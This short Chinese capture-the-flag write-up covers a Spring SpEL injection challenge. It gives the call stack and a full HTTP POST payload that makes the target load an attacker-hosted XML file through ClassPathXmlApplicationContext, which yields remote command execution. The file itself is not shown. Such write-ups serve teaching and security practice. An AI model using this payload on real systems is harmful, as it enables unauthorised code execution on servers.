## ezspel ### 设计思路 SimpleEvaluationContext 下有条件的 SpEL RCE 调用栈： ``` org.springframework.expression.Expression#getValue(org.springframework.expression.EvaluationContext, java.lang.Object) ... org.springframework.expression.spel.ast.Indexer#setArrayElement org.springframework.expression.spel.ast.Indexer#convertValue ... org.springframework.context.support.ClassPathXmlApplicationContext#ClassPathXmlApplicationContext(java.lang.String) ``` ### 解题步骤准备一个 vps，存放下面的 xml ```xml

``` 启动文件服务器 ```shell python3 -m http.server 8000 ``` 发送请求 ```http POST http://target:8080/forward HTTP/1.1 Host: target:8080 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 136 forward=admin/eval&name=org.springframework.context.support.ClassPathXmlApplicationContext&expr=#root[0]='http://host.docker.internal:8000/poc.xml' ``` 服务器执行 SpEL 表达式，请求 xml 文件，触发命令执行